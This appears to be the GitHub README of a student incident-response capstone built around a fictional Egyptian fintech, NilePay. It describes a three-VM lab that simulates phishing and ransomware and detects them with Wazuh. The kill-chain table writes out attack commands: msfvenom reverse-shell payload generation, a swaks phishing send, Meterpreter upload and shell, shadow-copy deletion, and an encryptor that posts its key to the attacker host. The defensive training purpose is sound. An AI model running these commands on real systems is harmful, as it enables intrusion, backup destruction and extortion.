yousephfatouh/Incident-Response-Plan-Development-and-Testing
GitHub: yousephfatouh/Incident-Response-Plan-Development-and-Testing
面向金融科技场景的网络安全事件响应计划毕业设计,基于 NIST、SANS 和 ISO 三大框架并结合 Wazuh SIEM 完成勒索软件与钓鱼攻击的端到端模拟与检测。
Stars: 0 | Forks: 0
# 🛡️ NilePay 金融服务
## 事件响应计划 — 毕业设计项目
[](https://mcit.gov.eg)
[](https://mcit.gov.eg)
[](#)
[](#)
[](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf)
[](#)
[](#)
[](https://wazuh.com)
[](#)
[](https://python.org)
*为 NilePay 金融服务 — 一家虚构的埃及 FinTech 组织,*开发并测试全面的事件响应计划*
## 📋 目录
- [项目概述](#-project-overview)
- [团队](#-team)
- [目标组织](#-target-organization)
- [框架架构](#-framework-architecture)
- [威胁态势](#-threat-landscape)
- [实验室环境](#-lab-environment)
- [攻击杀伤链](#-attack-kill-chain)
- [Wazuh 检测规则](#-wazuh-detection-rules)
- [检测结果](#-detection-results)
- [性能指标](#-performance-metrics)
- [IR 生命周期](#-ir-lifecycle)
- [代码库结构](#-repository-structure)
- [交付成果](#-deliverables)
- [工具与技术](#-tools--technologies)
- [免责声明](#-disclaimer)
## 🎯 项目概述
本项目遵循结构化的 **4周方法论**:
```
Week 1 ──► Research, Scoping & Threat Modeling
Week 2 ──► IR Plan Design & 4 Scenario Playbooks
Week 3 ──► SOC Lab Build & Attack Scenario Preparation
Week 4 ──► Live Simulation Execution & Metrics Measurement
```
### 主要成就
| 成就 | 结果 |
|-------------|--------|
| 🏗️ 构建 IR 计划 | 4 个针对特定场景的 playbook (PRO-001 至 PRO-004) |
| 🖥️ 部署 SOC 实验室 | 包含 Wazuh SIEM 的 3 虚拟机 VMware 环境 |
| ⚔️ 执行模拟 | 完整的 Phishing + Ransomware 杀伤链 |
| ⚡ 达到的 MTTD | **~2 秒** (目标为 15 分钟) |
| 📊 使用的框架 | NIST SP 800-61 · SANS PICERL · ISO/IEC 27035 |
| ✅ 涵盖的法规 | PCI-DSS v4.0 · GDPR · CBE 框架 |
## 👥 团队
| 角色 | 姓名 |
|------|------|
| 🏆 **团队负责人 — IR 项目经理** | Youseph Fatouh Sadek |
| 🔍 **威胁情报与场景设计师** | Ahmed Mohammed Mohammed |
| 📋 **合规与框架分析师** | Mohamed Saeed AbdElhameed |
| 🖥️ **SOC 工程师与 SIEM 专家** | Zeyad Mohamed Elsherbiny |
## 🏢 目标组织
```
╔══════════════════════════════════════════════════════════════╗
║ NilePay Financial Services S.A.E. ║
║ (Fictional Entity) ║
╠══════════════════════════════════════════════════════════════╣
║ Industry │ FinTech — Digital Payments & Banking ║
║ HQ │ Cairo, Egypt — Smart Village ║
║ Branch │ Alexandria, Egypt ║
║ Staff │ ~300 FTE ║
║ Customers │ 850,000 active digital wallet users ║
║ Volume │ EGP 2.4 Billion annually (simulated) ║
╠══════════════════════════════════════════════════════════════╣
║ Regulations: PCI-DSS v4.0 · GDPR · CBE Framework ║
╚══════════════════════════════════════════════════════════════╝
```
### 关键资产
| ID | 资产 | 密级 | 风险 |
|----|-------|---------------|------|
| AST-001 | 核心银行应用服务器 | 🔴 关键 | 支付中断 |
| AST-002 | 支付网关 API | 🔴 关键 | 欺诈与数据泄露 |
| AST-003 | 硬件安全模块 (HSM) | 🔴 关键 | 密钥泄露 |
| AST-004 | 客户 PII 数据库 (PostgreSQL) | 🟠 机密 | GDPR 违规 |
| AST-005 | 活动目录域控 | 🟡 高 | 横向移动 |
| AST-006 | 内部文件服务器 | 🟠 机密 | Ransomware 目标 |
| AST-007 | Wazuh SIEM 平台 | 🔒 受限 | SOC 致盲 |
| AST-008 | 员工工作站 (x180) | ⬜ 内部 | Phishing 入口 |
| AST-009 | 总部 ↔ 亚历山大 VPN 网关 | 🟡 高 | MITM 向量 |
| AST-010 | 备份与灾备库 | 🔴 关键 | 恢复受阻 |
## 🏗️ 框架架构
```
┌─────────────────────────────────────────────────────────────────┐
│ THREE-FRAMEWORK HYBRID MODEL │
│ │
│ ┌─────────────────┐ ┌─────────────────┐ ┌───────────────┐ │
│ │ NIST SP 800-61 │ │ SANS PICERL │ │ ISO/IEC 27035 │ │
│ │ │ │ │ │ │ │
│ │ OPERATIONAL │ │ PROCEDURAL │ │ GOVERNANCE │ │
│ │ BACKBONE │ │ DETAIL │ │ LAYER │ │
│ │ │ │ │ │ │ │
│ │ • IR Lifecycle │ │ • Runbooks │ │ • IR Policy │ │
│ │ • Team roles │ │ • Checklists │ │ • GDPR Art.33 │ │
│ │ • Evidence hdlg │ │ • Per-scenario │ │ • CBE reports │ │
│ │ • MTTD/MTTR │ │ procedures │ │ • Event class │ │
│ └────────┬────────┘ └────────┬────────┘ └───────┬───────┘ │
│ │ │ │ │
│ └───────────────────┼────────────────────┘ │
│ ▼ │
│ ┌─────────────────┐ │
│ │ NilePay IRP │ │
│ │ Complete Plan │ │
│ └─────────────────┘ │
└─────────────────────────────────────────────────────────────────┘
```
### 各 IR 阶段的框架覆盖范围
| IR 阶段 | NIST SP 800-61 | SANS PICERL | ISO/IEC 27035 |
|----------|---------------|-------------|---------------|
| **准备** | 团队角色、工具 | 准备就绪清单 | IR 策略、管理 |
| **检测** | 甄别,CAT1-4 | 日志分析,IoC 识别 | 事件分类 |
| **遏制** | 决策矩阵 | 针对特定场景的 runbook | 法律升级 |
| **根除** | 根本原因、补丁 | 恶意软件移除步骤 | 证据保全 |
| **恢复** | 恢复验证 | 服务恢复 runbook | CBE/GDPR 确认 |
| **经验教训** | MTTD/MTTR 模板 | 桌面推演总结 | 评审委员会流程 |
## ⚠️ 威胁态势
### MITRE ATT&CK 覆盖范围
```
RANSOMWARE ────────────────────────────────────────── P1 CRITICAL
T1566.001 → T1059.003 → T1490 → T1486
Phishing → CMD Shell → VSS Delete → File Encrypt
PHISHING / BEC ────────────────────────────────────── P1 HIGH
T1566.002 → T1078 → T1114.002 → T1657
Link → Valid Accounts → Email Collection → BEC Fraud
MALWARE / RAT ─────────────────────────────────────── P2 HIGH
T1204.002 → T1547.001 → T1056.001 → T1071.001
Execution → Persistence → Keylog → C2 Beaconing
DATA BREACH ───────────────────────────────────────── P1 CRITICAL
T1046 → T1550.002 → T1213 → T1048.003
Scan → Pass-Hash → DB Exfil → Exfil over HTTP
```
### 威胁优先级矩阵
| # | 场景 | 可能性 | 影响 | 优先级 | 法规触发条件 |
|---|----------|-----------|--------|----------|-------------------|
| 1 | 🔴 Ransomware | 高 | 关键 | **P1** | PCI-DSS 12.10 · CBE 24小时 |
| 2 | 🟠 Phishing / BEC | 极高 | 高 | **P1** | 若影响 PII 则触发 GDPR 第33条 |
| 3 | 🟣 恶意软件 / RAT | 高 | 高 | **P2** | 若数据外泄则触发 GDPR 第33条 |
| 4 | 🔵 数据泄露 | 中 | 关键 | **P1** | GDPR 第33条 · PCI-DSS · CBE |
## 🖥️ 实验室环境
### 网络拓扑
```
┌──────────────────────────────────────────────────────────────┐
│ VMware Workstation — Host Machine │
│ │
│ VMware Host-Only Network: 192.168.200.0/24 │
│ ───────────────────────────────────────── │
│ │ │ │ │
│ ┌────┴────┐ ┌────┴────┐ ┌────┴────┐ │
│ │ VM-01 │ │ VM-02 │ │ VM-03 │ │
│ │ │ │ │ │ │ │
│ │ Kali │ │ Windows │ │ Ubuntu │ │
│ │ Linux │ │ 10 │ │ Wazuh │ │
│ │ │ │ PC-101 │ │ SIEM │ │
│ │.200.200 │ │.200.130 │ │.200.100 │ │
│ │ │ │ │ │ │ │
│ │ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └────┬────┘ └────┬────┘ └────┬────┘ │
│ │ │ │ │
│ Metasploit Wazuh Agent Wazuh Manager │
│ msfvenom Sysmon v15 Wazuh Indexer │
│ swaks+Postfix Thunderbird Wazuh Dashboard │
│ receive_key.py encryptor.py Custom Rules │
│ HTTP :8080 cryptography 100001-100004 │
│ │
└──────────────────────────────────────────────────────────────┘
```
### 虚拟机规格
| 虚拟机 | 操作系统 | IP | 内存 | 主要工具 |
|----|----|----|-----|-----------|
| 攻击者 | Kali Linux | 192.168.200.200 | 2GB | Metasploit · msfvenom · swaks · Postfix · Python |
| 受害者 (PC-101) | Windows 10 | 192.168.200.130 | 4GB | Wazuh Agent · Sysmon · Thunderbird · Python |
| SIEM 服务器 | Ubuntu 22.04 | 192.168.200.100 | 4GB | Wazuh Manager · Indexer · Dashboard |
## ⚔️ 攻击杀伤链
### Phishing + Ransomware — 完整模拟流程
```
┌─────────────────────────────────────────────────────────────────────┐
│ ATTACK KILL CHAIN │
│ │
│ KALI (Attacker) WINDOWS (Victim) WAZUH (SOC) │
│ ───────────────── ────────────────── ──────────── │
│ │
│ 01. Generate payload ──► │
│ msfvenom invoice.exe │
│ │
│ 02. Send phishing ──────────► 03. Victim receives │
│ email via swaks email in Thunderbird │
│ │
│ 04. Clicks "View Invoice" ──► │
│ link in email │
│ │
│ 05. HTTP server ◄─────────── Browser loads invoice.html │
│ serves payload │
│ │
│ 06. invoice.exe executed ──────► Rule 100004
│ │ Level 12
│ 07. Meterpreter ◄─────────── Reverse TCP :4444 │
│ session opens PWNED │
│ │
│ 08. Upload ─────────────────► encryptor.py uploaded │
│ encryptor.py to Documents folder │
│ │
│ 09. Execute shell ──────────► vssadmin delete ──────► Rule 100002
│ vssadmin cmd shadows /all │ Level 15
│ │
│ 10. Execute ────────────────► Files encrypted ──────► FIM 553/554
│ encryptor.py .encrypted created │
│ │
│ 11. Key received ◄────────── HTTP POST :8888 │
│ PC-101_key.txt key exfiltrated │
│ │
│ 12. README_DECRYPT.txt │
│ dropped on Desktop │
└─────────────────────────────────────────────────────────────────────┘
```
### 逐步杀伤链
| 步骤 | 执行者 | 命令 / 操作 | 结果 |
|------|-------|-----------------|--------|
| 01 | 攻击者 | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.200 LPORT=4444 -f exe -o invoice.exe` | 生成 Payload |
| 02 | 攻击者 | `swaks --to victim@nilepay.com --attach invoice.html` | 发送 Phishing 邮件 |
| 03 | 受害者 | 在 Thunderbird 中打开邮件 | 收到邮件 |
| 04 | 受害者 | 点击“查看发票”超链接 | 浏览器打开 invoice.html |
| 05 | 浏览器 | `http://192.168.200.200:8080/invoice.exe` | Payload 下载完成 |
| 06 | 受害者 | 双击 `invoice.exe` | Meterpreter 连接建立 |
| 07 | 攻击者 | `meterpreter > upload encryptor.py C:\\Users\\PC-101\\Documents\\` | 脚本上传完成 |
| 08 | 攻击者 | `meterpreter > shell` | 获取 CMD shell |
| 09 | 攻击者 | `vssadmin delete shadows /all /quiet` | 备份被破坏 |
| 10 | 攻击者 | `python C:\Users\PC-101\Documents\encryptor.py` | 文件被加密 |
| 11 | 脚本 | HTTP POST → `192.168.200.200:8888` | 密钥保存在 Kali 桌面 |
| 12 | 脚本 | 创建 `README_DECRYPT.txt` | 投递勒索说明 |
## 🔍 Wazuh 检测规则
```
| 类别 | 工具 | 版本 | 用途 |
|----------|------|---------|---------|
| **SIEM** | Wazuh | 4.7.x | 告警检测、FIM、日志聚合 |
| **端点监控** | Sysmon | v15 | Windows 事件遥测 |
| **攻击框架** | Metasploit | 最新版 | C2 处理程序、后渗透 |
| **Payload 生成器** | msfvenom | 内置 | Reverse TCP payload |
| **邮件投递** | swaks + Postfix | 最新版 | Phishing 邮件模拟 |
| **加密** | Python cryptography (Fernet) | 41.x | 文件加密模拟 |
| **虚拟化** | VMware Workstation | 最新版 | 实验室隔离 |
| **邮件客户端** | Mozilla Thunderbird | 最新版 | 受害者邮件客户端 |
| **操作系统 — 攻击者** | Kali Linux | 最新版 | 攻击平台 |
| **操作系统 — 受害者** | Windows 10 | 22H2 | 目标端点 |
| **操作系统 — SIEM** | Ubuntu | 22.04 LTS | Wazuh 主机 |
## 📋 法规合规
| 法规 | 要求 | 实施情况 | 状态 |
|------------|-------------|----------------|--------|
| PCI-DSS v4.0 要求 12.10 | 已记录的 IR 计划 + 年度测试 | IRP + 实时模拟 | ✅ |
| GDPR 第 33 条 | 72 小时违规通知 | 已记录在 PRO-004 中 | ✅ |
| GDPR 第 34 条 | 数据主体通知 | PRO-004 中的客户沟通 | ✅ |
| CBE 网络安全框架 | 向中央银行报告 | 纳入升级矩阵 | ✅ |
| ISO/IEC 27001 A.16 | 事件管理控制 | CAT-1 至 CAT-4 系统 | ✅ |
## ⚠️ 免责声明
标签:CISA项目, PB级数据处理, Python, Wazuh, 安全运维, 库, 应急响应, 无后门, 测试用例, 金融科技